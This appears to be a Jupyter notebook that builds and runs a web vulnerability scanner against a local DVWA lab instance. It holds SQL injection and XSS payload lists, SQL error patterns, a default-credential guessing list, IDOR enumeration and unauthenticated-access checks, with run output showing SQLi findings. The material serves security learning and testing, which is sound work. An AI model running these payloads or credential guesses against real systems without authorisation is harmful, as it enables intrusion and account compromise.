In [7]:
pip install tqdm


Collecting tqdm
  Downloading tqdm-4.67.1-py3-none-any.whl.metadata (57 kB)
Downloading tqdm-4.67.1-py3-none-any.whl (78 kB)
Installing collected packages: tqdm
Successfully installed tqdm-4.67.1
Note: you may need to restart the kernel to use updated packages.


In [2]:
import time
import re
import csv
from urllib.parse import urljoin, urldefrag, urlparse, parse_qs, urlencode, urlunparse
import requests
from bs4 import BeautifulSoup
from collections import deque
from tqdm import tqdm

# ==============================
# SQL Injection Payloads & Errors (Safe List)
# ==============================
SQL_PAYLOADS = [
    "' OR '1'='1",
    "\" OR \"1\"=\"1",
    "1'--",
    "1 OR 1=1",
    "' UNION SELECT NULL--"
    # ❌ Removed dangerous payloads like DROP TABLE
]

SQL_ERROR_PATTERNS = [
    "you have an error in your sql syntax;",
    "warning: mysql",
    "unclosed quotation mark after the character string",
    "quoted string not properly terminated",
    "pg_query",
    "mysql_fetch",
    "sql error"
]

def find_sql_errors(html):
    """Scan response HTML for common SQL error messages."""
    for pattern in SQL_ERROR_PATTERNS:
        if pattern.lower() in html.lower():
            return True, pattern
    return False, None


# ==============================
# XSS Payloads & Reflection Patterns
# ==============================
XSS_PAYLOADS = [
    "<script>alert(1)</script>",
    "<img src=x onerror=alert(1)>",
    "<svg onload=alert(1)>"
]

REFLECT_PATTERNS = [re.compile(re.escape(p), re.IGNORECASE) for p in XSS_PAYLOADS]


# ==============================
# DVWA Web Crawler
# ==============================
class DVWACrawler:
    def __init__(self, base_url, username="admin", password="password",
                 max_pages=20, delay=2):  # ⬅ Delay increased to 2s
        self.base_url = base_url.rstrip("/")
        self.max_pages = max_pages
        self.delay = delay
        self.session = requests.Session()
        self.visited = set()
        self.queue = deque([self.base_url])
        self.pages = {}
        self.forms = {}

        # login first
        self.login(username, password)

    def normalize_url(self, url):
        """Normalize URL by stripping fragments/trailing slash."""
        clean_url = urldefrag(url)[0].rstrip("/")
        return clean_url

    def login(self, username, password):
        """Logs into DVWA using session-based authentication."""
        login_url = f"{self.base_url}/login.php"
        resp = self.session.get(login_url)
        soup = BeautifulSoup(resp.text, "html.parser")

        token = soup.find("input", {"name": "user_token"})
        token_val = token["value"] if token else ""

        payload = {
            "username": username,
            "password": password,
            "Login": "Login",
            "user_token": token_val
        }

        login_resp = self.session.post(login_url, data=payload)
        if "Login failed" in login_resp.text:
            raise Exception("Login failed: check credentials or CSRF token.")
        print("✅ Login successful")

    def extract_links(self, html, page_url):
        """Extract all same-domain links from a page."""
        soup = BeautifulSoup(html, "html.parser")
        links = []
        for a in soup.find_all("a", href=True):
            abs_url = urljoin(page_url, a["href"])
            clean_url = self.normalize_url(abs_url)
            if clean_url.startswith(self.base_url):
                links.append(clean_url)
        return links

    def extract_forms(self, html, page_url):
        """Extract form details (method, action, inputs)."""
        soup = BeautifulSoup(html, "html.parser")
        forms = []
        for form in soup.find_all("form"):
            details = {
                "method": form.get("method", "get").lower(),
                "action": urljoin(page_url, form.get("action", "")),
                "inputs": []
            }
            for inp in form.find_all(["input", "textarea", "select"]):
                details["inputs"].append({
                    "name": inp.get("name"),
                    "type": inp.get("type", inp.name),
                    "value": inp.get("value", "")
                })
            forms.append(details)
        return forms

    def crawl(self):
        """Main crawl loop."""
        with tqdm(total=self.max_pages, desc="Crawling") as pbar:
            while self.queue and len(self.visited) < self.max_pages:
                url = self.normalize_url(self.queue.popleft())

                if url in self.visited:
                    continue

                try:
                    resp = self.session.get(url, timeout=10)
                    resp.raise_for_status()
                    html = resp.text
                except Exception as e:
                    print(f" Error fetching {url}: {e}")
                    self.visited.add(url)
                    continue

                # store page
                self.pages[url] = html

                # extract & store forms
                page_forms = self.extract_forms(html, url)
                if page_forms:
                    self.forms[url] = page_forms

                # extract & enqueue links
                for link in self.extract_links(html, url):
                    if link not in self.visited and link not in self.queue:
                        self.queue.append(link)

                self.visited.add(url)
                print(f"✅ Crawled: {url}")
                pbar.update(1)

                time.sleep(self.delay)

        return {"pages": self.pages, "forms": self.forms, "session": self.session}


# ==============================
# SQL Injection Scanner
# ==============================
class SQLiScanner:
    def __init__(self, session, timeout=10):
        self.session = session
        self.timeout = timeout
        self.findings = []

    def test_url_params(self, url):
        """Inject SQL payloads into URL query parameters."""
        parsed = urlparse(url)
        params = parse_qs(parsed.query)

        if not params:
            return

        for param in params:
            for payload in SQL_PAYLOADS:
                test_params = params.copy()
                test_params[param] = payload
                new_query = urlencode(test_params, doseq=True)
                new_url = urlunparse(parsed._replace(query=new_query))

                try:
                    resp = self.session.get(new_url, timeout=self.timeout)
                    found, pattern = find_sql_errors(resp.text)
                    if found:
                        self.findings.append({
                            "type": "SQLi-URL",
                            "url": new_url,
                            "parameter": param,
                            "payload": payload,
                            "error": pattern
                        })
                        print(f"🔥 SQLi detected in {new_url} param={param} payload={payload}")
                except Exception:
                    pass
                time.sleep(0.2)  # ⬅ slow down

    def test_forms(self, forms_by_url):
        """Inject SQL payloads into HTML forms."""
        for page_url, forms in forms_by_url.items():
            for form in forms:
                action = form.get("action") or page_url
                method = form.get("method", "get").lower()

                base_data = {inp["name"]: (inp.get("value") or "test")
                             for inp in form["inputs"] if inp.get("name")}

                for field in base_data:
                    for payload in SQL_PAYLOADS:
                        test_data = base_data.copy()
                        test_data[field] = payload

                        try:
                            if method == "post":
                                resp = self.session.post(action, data=test_data,
                                                         timeout=self.timeout)
                            else:
                                resp = self.session.get(action, params=test_data,
                                                        timeout=self.timeout)

                            found, pattern = find_sql_errors(resp.text)
                            if found:
                                self.findings.append({
                                    "type": "SQLi-FORM",
                                    "url": action,
                                    "field": field,
                                    "payload": payload,
                                    "error": pattern
                                })
                                print(f"🔥 SQLi detected in form {action} field={field} payload={payload}")
                        except Exception:
                            pass
                        time.sleep(0.2)  # ⬅ slow down

    def run(self, pages, forms):
        """Run scanner against crawler results."""
        for url in pages.keys():
            self.test_url_params(url)
        self.test_forms(forms)
        return self.findings


# ==============================
# XSS Scanner
# ==============================
class XSSScanner:
    def __init__(self, session, timeout=10):
        self.session = session
        self.timeout = timeout
        self.findings = []

    def test_url_params(self, url):
        """Inject XSS payloads into URL query parameters."""
        parsed = urlparse(url)
        params = parse_qs(parsed.query)

        if not params:
            return

        for param in params:
            for payload in XSS_PAYLOADS:
                test_params = params.copy()
                test_params[param] = payload
                new_query = urlencode(test_params, doseq=True)
                new_url = urlunparse(parsed._replace(query=new_query))

                try:
                    resp = self.session.get(new_url, timeout=self.timeout)
                    for pattern in REFLECT_PATTERNS:
                        if pattern.search(resp.text):
                            self.findings.append({
                                "type": "XSS-URL",
                                "url": new_url,
                                "parameter": param,
                                "payload": payload
                            })
                            print(f"⚡ XSS detected in {new_url} param={param} payload={payload}")
                            break
                except Exception:
                    pass
                time.sleep(0.2)

    def test_forms(self, forms_by_url):
        """Inject XSS payloads into HTML forms."""
        for page_url, forms in forms_by_url.items():
            for form in forms:
                action = form.get("action") or page_url
                method = form.get("method", "get").lower()

                base_data = {inp["name"]: (inp.get("value") or "test")
                             for inp in form["inputs"] if inp.get("name")}

                for field in base_data:
                    for payload in XSS_PAYLOADS:
                        test_data = base_data.copy()
                        test_data[field] = payload

                        try:
                            if method == "post":
                                resp = self.session.post(action, data=test_data,
                                                         timeout=self.timeout)
                            else:
                                resp = self.session.get(action, params=test_data,
                                                        timeout=self.timeout)

                            for pattern in REFLECT_PATTERNS:
                                if pattern.search(resp.text):
                                    self.findings.append({
                                        "type": "XSS-FORM",
                                        "url": action,
                                        "field": field,
                                        "payload": payload
                                    })
                                    print(f"⚡ XSS detected in form {action} field={field} payload={payload}")
                                    break
                        except Exception:
                            pass
                        time.sleep(0.2)

    def run(self, pages, forms):
        """Run scanner against crawler results."""
        for url in pages.keys():
            self.test_url_params(url)
        self.test_forms(forms)
        return self.findings


# ==============================
# Main
# ==============================
if __name__ == "__main__":
    base_url = "http://localhost:8080"  # Change to your DVWA URL

    # Step 1: Crawl
    crawler = DVWACrawler(base_url, username="admin", password="password",
                          max_pages=10, delay=2)  # ⬅ safer delay
    crawl_results = crawler.crawl()

    # Step 2: SQL Injection Scan
    sqli_scanner = SQLiScanner(crawl_results["session"])
    sqli_findings = sqli_scanner.run(crawl_results["pages"], crawl_results["forms"])

    # Step 3: XSS Scan
    xss_scanner = XSSScanner(crawl_results["session"])
    xss_findings = xss_scanner.run(crawl_results["pages"], crawl_results["forms"])

    # Step 4: Pretty Report
    print("\n=== Vulnerability Findings ===")
    all_findings = sqli_findings + xss_findings
    if all_findings:
        for f in all_findings:
            print(f"[{f['type']}]")
            print(f"   URL: {f['url']}")
            if 'parameter' in f:
                print(f"   Parameter: {f['parameter']}")
            if 'field' in f:
                print(f"   Field: {f['field']}")
            print(f"   Payload: {f['payload']}")
            if 'error' in f:
                print(f"   Error: {f['error']}")
            print("-" * 50)
    else:
        print("No SQLi or XSS vulnerabilities detected.")

    # Step 5: Export to CSV
    with open("scan_results.csv", "w", newline="", encoding="utf-8") as f:
        writer = csv.DictWriter(f, fieldnames=["type", "url", "parameter", "field", "payload", "error"])
        writer.writeheader()
        for finding in all_findings:
            writer.writerow(finding)
    print("\n📂 Results saved to scan_results.csv")

    print("\n=== Mitigation Tips ===")
    print("SQLi Fixes: Use parameterized queries (PreparedStatements), ORM, input validation.")
    print("XSS Fixes: Validate input, encode output, apply Content Security Policy (CSP).")


✅ Login successful


Crawling:   0%|                                                                                 | 0/10 [00:00<?, ?it/s]

✅ Crawled: http://localhost:8080


Crawling:  20%|██████████████▌                                                          | 2/10 [00:02<00:08,  1.04s/it]

✅ Crawled: http://localhost:8080/instructions.php


Crawling:  30%|█████████████████████▉                                                   | 3/10 [00:04<00:10,  1.45s/it]

✅ Crawled: http://localhost:8080/setup.php


Crawling:  40%|█████████████████████████████▏                                           | 4/10 [00:06<00:10,  1.67s/it]

✅ Crawled: http://localhost:8080/vulnerabilities/brute


Crawling:  50%|████████████████████████████████████▌                                    | 5/10 [00:08<00:09,  1.82s/it]

✅ Crawled: http://localhost:8080/vulnerabilities/exec


Crawling:  60%|███████████████████████████████████████████▊                             | 6/10 [00:10<00:07,  1.90s/it]

✅ Crawled: http://localhost:8080/vulnerabilities/csrf


Crawling:  70%|███████████████████████████████████████████████████                      | 7/10 [00:12<00:05,  1.96s/it]

✅ Crawled: http://localhost:8080/vulnerabilities/fi/?page=include.php


Crawling:  80%|██████████████████████████████████████████████████████████▍              | 8/10 [00:14<00:03,  1.98s/it]

✅ Crawled: http://localhost:8080/vulnerabilities/upload


Crawling:  90%|█████████████████████████████████████████████████████████████████▋       | 9/10 [00:16<00:02,  2.01s/it]

✅ Crawled: http://localhost:8080/vulnerabilities/captcha


Crawling: 100%|████████████████████████████████████████████████████████████████████████| 10/10 [00:18<00:00,  2.04s/it]

✅ Crawled: http://localhost:8080/vulnerabilities/sqli


Crawling: 100%|████████████████████████████████████████████████████████████████████████| 10/10 [00:20<00:00,  2.06s/it]


🔥 SQLi detected in form http://localhost:8080/vulnerabilities/brute field=username payload=1'--
🔥 SQLi detected in form http://localhost:8080/vulnerabilities/brute field=username payload=' UNION SELECT NULL--
🔥 SQLi detected in form http://localhost:8080/vulnerabilities/sqli field=id payload=1'--
🔥 SQLi detected in form http://localhost:8080/vulnerabilities/sqli field=id payload=' UNION SELECT NULL--

=== Vulnerability Findings ==
[SQLi-FORM]
   URL: http://localhost:8080/vulnerabilities/brute
   Field: username
   Payload: 1'--
   Error: you have an error in your sql syntax;
--------------------------------------------------
[SQLi-FORM]
   URL: http://localhost:8080/vulnerabilities/brute
   Field: username
   Payload: ' UNION SELECT NULL--
   Error: you have an error in your sql syntax;
--------------------------------------------------
[SQLi-FORM]
   URL: http://localhost:8080/vulnerabilities/sqli
   Field: id
   Payload: 1'--
   Error: you have an error in your sql syntax;
---------

In [5]:
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin, urlparse
import time


class AuthSessionTester:
    DEFAULT_CREDENTIALS = [
        ("admin", "admin"),
        ("admin", "password"),
        ("root", "root"),
        ("test", "test")
    ]

    def __init__(self, base_url, session=None, timeout=10):
        self.base_url = base_url.rstrip("/")
        self.session = session or requests.Session()
        self.timeout = timeout
        self.findings = []

    def test_weak_credentials(self, login_path="/login.php"):
        """Try common weak/default credentials."""
        login_url = urljoin(self.base_url, login_path.lstrip("/"))
        print(f"\n🔎 Testing Weak Credentials at {login_url}")

        for user, pwd in self.DEFAULT_CREDENTIALS:
            try:
                # Grab CSRF token if present
                r = self.session.get(login_url, timeout=self.timeout)
                soup = BeautifulSoup(r.text, "html.parser")
                token = soup.find("input", {"name": "user_token"})
                token_val = token["value"] if token else ""

                data = {
                    "username": user,
                    "password": pwd,
                    "Login": "Login",
                    "user_token": token_val
                }
                resp = self.session.post(login_url, data=data, timeout=self.timeout)

                if "Logout" in resp.text or "Welcome" in resp.text:
                    print(f"🔥 Weak credentials found → {user}:{pwd}")
                    self.findings.append({
                        "type": "Weak-Credentials",
                        "username": user,
                        "password": pwd
                    })
                else:
                    print(f"[-] {user}:{pwd} rejected")
            except Exception as e:
                print(f"[Error] {e}")
            time.sleep(0.5)

        return self.findings

    def check_cookie_flags(self, login_path="/login.php"):
        """Check for Secure, HttpOnly, SameSite flags in cookies."""
        login_url = urljoin(self.base_url, login_path.lstrip("/"))
        print("\n🔎 Checking Cookie Flags")

        try:
            resp = self.session.get(login_url, timeout=self.timeout)
            set_cookie = resp.headers.get("set-cookie", "")
            issues = []
            if "httponly" not in set_cookie.lower():
                issues.append("Missing HttpOnly")
            if "secure" not in set_cookie.lower():
                issues.append("Missing Secure")
            if "samesite" not in set_cookie.lower():
                issues.append("Missing SameSite")

            if issues:
                print("⚠️ Cookie flag issues:", ", ".join(issues))
                self.findings.append({
                    "type": "Cookie-Issues",
                    "issues": issues
                })
            else:
                print("✅ Cookie flags appear secure")

        except Exception as e:
            print(f"[Error] {e}")
        return self.findings


class AccessControlTester:
    def __init__(self, base_url, session=None, timeout=10):
        self.base_url = base_url.rstrip("/")
        self.session = session or requests.Session()
        self.timeout = timeout
        self.findings = []

    def test_idor(self, path="/vulnerabilities/idor/", param="id", start=1, stop=3):
        """Check for IDOR by iterating object IDs."""
        url = urljoin(self.base_url, path.lstrip("/"))
        print(f"\n🔎 Testing IDOR at {url} (param={param})")

        for uid in range(start, stop + 1):
            try:
                resp = self.session.get(url, params={param: uid}, timeout=self.timeout)
                body = resp.text.lower()

                if "unauthorized" not in body and "forbidden" not in body:
                    if "username" in body or "email" in body or "account" in body:
                        print(f"🔥 Possible IDOR → accessed data for {param}={uid}")
                        self.findings.append({
                            "type": "IDOR",
                            "url": url,
                            "param": param,
                            "value": uid
                        })
                    else:
                        print(f"[?] {param}={uid} returned content (needs review)")
                else:
                    print(f"[-] {param}={uid} blocked")
            except Exception as e:
                print(f"[Error] {e}")
        return self.findings

    def test_role_bypass(self, protected_paths=None):
        """Try to access sensitive endpoints without authentication."""
        if protected_paths is None:
            protected_paths = ["/admin/", "/config.php", "/vulnerabilities/"]

        print("\n🔎 Testing Access Control (Role Bypass)")
        for path in protected_paths:
            url = urljoin(self.base_url, path.lstrip("/"))
            try:
                resp = requests.get(url, timeout=self.timeout)  # new session (unauth)
                if resp.status_code == 200 and "login" not in resp.text.lower():
                    print(f"🔥 Access Control issue → {url} accessible without login")
                    self.findings.append({
                        "type": "Access-Control",
                        "url": url,
                        "status": resp.status_code
                    })
                else:
                    print(f"[-] {url} seems protected")
            except Exception as e:
                print(f"[Error] {e}")
        return self.findings


if __name__ == "__main__":
    base_url = "http://localhost:8080"  # Change to your DVWA or test target

    auth_tester = AuthSessionTester(base_url)
    auth_tester.test_weak_credentials()
    auth_tester.check_cookie_flags()

    access_tester = AccessControlTester(base_url)
    access_tester.test_idor(path="/vulnerabilities/idor/", param="id", start=1, stop=5)
    access_tester.test_role_bypass()

    print("\n=== Findings ")
    all_findings = auth_tester.findings + access_tester.findings
    if all_findings:
        for f in all_findings:
            print(f)
    else:
        print("No major authentication or access control issues found.")



🔎 Testing Weak Credentials at http://localhost:8080/login.php
[-] admin:admin rejected
[-] admin:password rejected
[-] root:root rejected
[-] test:test rejected

🔎 Checking Cookie Flags
⚠️ Cookie flag issues: Missing HttpOnly, Missing Secure, Missing SameSite

🔎 Testing IDOR at http://localhost:8080/vulnerabilities/idor/ (param=id)
[?] id=1 returned content (needs review)
[?] id=2 returned content (needs review)
[?] id=3 returned content (needs review)
[?] id=4 returned content (needs review)
[?] id=5 returned content (needs review)

🔎 Testing Access Control (Role Bypass)
[-] http://localhost:8080/admin/ seems protected
[-] http://localhost:8080/config.php seems protected
🔥 Access Control issue → http://localhost:8080/vulnerabilities/ accessible without login

=== Findings 
{'type': 'Cookie-Issues', 'issues': ['Missing HttpOnly', 'Missing Secure', 'Missing SameSite']}
{'type': 'Access-Control', 'url': 'http://localhost:8080/vulnerabilities/', 'status': 200}
